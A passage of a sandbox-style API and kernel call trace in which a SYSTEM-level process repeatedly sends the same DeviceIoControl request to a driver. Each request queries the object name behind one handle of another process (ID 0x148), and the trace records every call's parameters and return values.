IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0132.045] CloseHandle (hObject=0xc4) returned 1 [0132.045] CloseHandle (hObject=0xc8) returned 1 [0132.045] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.045] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0132.045] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.045] PsAcquireProcessExitSynchronization () returned 0x0 [0132.046] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.046] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003535f20, HandleInformation=0x0) returned 0x0 [0132.046] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.046] PsReleaseProcessExitSynchronization () returned 0x2 [0132.046] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.046] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163508) returned 0x0 [0132.046] ObfDereferenceObject (Object=0xfffffa8003535f20) returned 0x1 [0132.046] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.046] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.046] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.046] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x36, lpOverlapped=0x0) returned 1 [0132.046] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.046] PsAcquireProcessExitSynchronization () returned 0x0 [0132.046] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.046] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a004425850, HandleInformation=0x0) returned 0x0 [0132.046] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.046] PsReleaseProcessExitSynchronization () returned 0x2 [0132.046] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.046] ObQueryNameString (in: Object=0xfffff8a004425850, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.046] ObfDereferenceObject (Object=0xfffff8a004425850) returned 0x2 [0132.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.047] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.047] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.047] PsAcquireProcessExitSynchronization () returned 0x0 [0132.047] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.047] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0000ff5a0, HandleInformation=0x0) returned 0x0 [0132.047] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.047] PsReleaseProcessExitSynchronization () returned 0x2 [0132.047] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.047] ObQueryNameString (in: Object=0xfffff8a0000ff5a0, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.047] ObfDereferenceObject (Object=0xfffff8a0000ff5a0) returned 0x1 [0132.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.047] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.047] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.047] PsAcquireProcessExitSynchronization () returned 0x0 [0132.047] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.048] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a008995de0, HandleInformation=0x0) returned 0x0 [0132.048] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.048] PsReleaseProcessExitSynchronization () returned 0x2 [0132.048] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.048] ObQueryNameString (in: Object=0xfffff8a008995de0, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.048] ObfDereferenceObject (Object=0xfffff8a008995de0) returned 0x1 [0132.048] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.048] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.048] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0132.048] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.048] PsAcquireProcessExitSynchronization () returned 0x0 [0132.048] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.048] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003650f20, HandleInformation=0x0) returned 0x0 [0132.048] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.048] PsReleaseProcessExitSynchronization () returned 0x2 [0132.048] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.048] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163508) returned 0x0 [0132.048] ObfDereferenceObject (Object=0xfffffa8003650f20) returned 0x1 [0132.048] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.048] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.049] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.049] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.049] PsAcquireProcessExitSynchronization () returned 0x0 [0132.049] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.049] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0089816b0, HandleInformation=0x0) returned 0x0 [0132.049] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.049] PsReleaseProcessExitSynchronization () returned 0x2 [0132.049] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.049] ObQueryNameString (in: Object=0xfffff8a0089816b0, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.049] ObfDereferenceObject (Object=0xfffff8a0089816b0) returned 0x1 [0132.049] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.049] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.049] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.049] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.049] PsAcquireProcessExitSynchronization () returned 0x0 [0132.049] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.049] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00897a600, HandleInformation=0x0) returned 0x0 [0132.049] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.049] PsReleaseProcessExitSynchronization () returned 0x2 [0132.049] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.050] ObQueryNameString (in: Object=0xfffff8a00897a600, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.050] ObfDereferenceObject (Object=0xfffff8a00897a600) returned 0x1 [0132.050] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.050] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.050] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.050] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.050] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.050] PsAcquireProcessExitSynchronization () returned 0x0 [0132.050] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.050] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00899bca0, HandleInformation=0x0) returned 0x0 [0132.050] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.050] PsReleaseProcessExitSynchronization () returned 0x2 [0132.050] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.050] ObQueryNameString (in: Object=0xfffff8a00899bca0, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.050] ObfDereferenceObject (Object=0xfffff8a00899bca0) returned 0x1 [0132.050] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.050] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.050] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.051] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.051] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.051] PsAcquireProcessExitSynchronization () returned 0x0 [0132.051] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.051] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001f7d4d0, HandleInformation=0x0) returned 0x0 [0132.051] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.051] PsReleaseProcessExitSynchronization () returned 0x2 [0132.051] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.051] ObQueryNameString (in: Object=0xfffff8a001f7d4d0, ObjectNameInfo=0xfffffa800295a144, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800295a144, ReturnLength=0xfffff88005163550) returned 0x0 [0132.051] ObfDereferenceObject (Object=0xfffff8a001f7d4d0) returned 0x1 [0132.051] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.051] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.051] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.051] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.051] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.051] PsAcquireProcessExitSynchronization () returned 0x0 [0132.051] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.051] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000a47e40, HandleInformation=0x0) returned 0x0 [0132.051] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.051] PsReleaseProcessExitSynchronization () returned 0x2 [0132.051] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.052] ObQueryNameString (in: Object=0xfffff8a000a47e40, ObjectNameInfo=0xfffffa8002f17044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f17044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.052] ObfDereferenceObject (Object=0xfffff8a000a47e40) returned 0x1 [0132.052] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.052] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.052] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.052] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.052] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.052] PsAcquireProcessExitSynchronization () returned 0x0 [0132.052] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.052] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0089774a0, HandleInformation=0x0) returned 0x0 [0132.052] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.052] PsReleaseProcessExitSynchronization () returned 0x2 [0132.052] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.052] ObQueryNameString (in: Object=0xfffff8a0089774a0, ObjectNameInfo=0xfffffa8002f7c504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7c504, ReturnLength=0xfffff88005163550) returned 0x0 [0132.052] ObfDereferenceObject (Object=0xfffff8a0089774a0) returned 0x1 [0132.053] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.053] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.053] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.053] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.053] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.053] PsAcquireProcessExitSynchronization () returned 0x0 [0132.053] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.053] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000cb0c90, HandleInformation=0x0) returned 0x0 [0132.053] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.053] PsReleaseProcessExitSynchronization () returned 0x2 [0132.053] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.053] ObQueryNameString (in: Object=0xfffff8a000cb0c90, ObjectNameInfo=0xfffffa8002492044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002492044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.053] ObfDereferenceObject (Object=0xfffff8a000cb0c90) returned 0x1 [0132.053] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.053] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.053] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.053] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.053] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.053] PsAcquireProcessExitSynchronization () returned 0x0 [0132.053] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.053] ObReferenceObjectByHandle (in: Handle=0x30c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001432c90, HandleInformation=0x0) returned 0x0 [0132.054] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.054] PsReleaseProcessExitSynchronization () returned 0x2 [0132.054] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.054] ObQueryNameString (in: Object=0xfffff8a001432c90, ObjectNameInfo=0xfffffa8002874044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002874044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.054] ObfDereferenceObject (Object=0xfffff8a001432c90) returned 0x1 [0132.054] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.054] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.054] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.054] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.054] PsAcquireProcessExitSynchronization () returned 0x0 [0132.054] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.054] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00112c820, HandleInformation=0x0) returned 0x0 [0132.054] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.054] PsReleaseProcessExitSynchronization () returned 0x2 [0132.054] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.054] ObQueryNameString (in: Object=0xfffff8a00112c820, ObjectNameInfo=0xfffffa8002873044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002873044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.054] ObfDereferenceObject (Object=0xfffff8a00112c820) returned 0x1 [0132.054] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.054] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.055] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.055] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.055] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.055] PsAcquireProcessExitSynchronization () returned 0x0 [0132.055] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.055] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f88880, HandleInformation=0x0) returned 0x0 [0132.055] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.055] PsReleaseProcessExitSynchronization () returned 0x2 [0132.055] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.055] ObQueryNameString (in: Object=0xfffff8a000f88880, ObjectNameInfo=0xfffffa800281d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.055] ObfDereferenceObject (Object=0xfffff8a000f88880) returned 0x1 [0132.055] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.055] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.055] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.055] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.055] 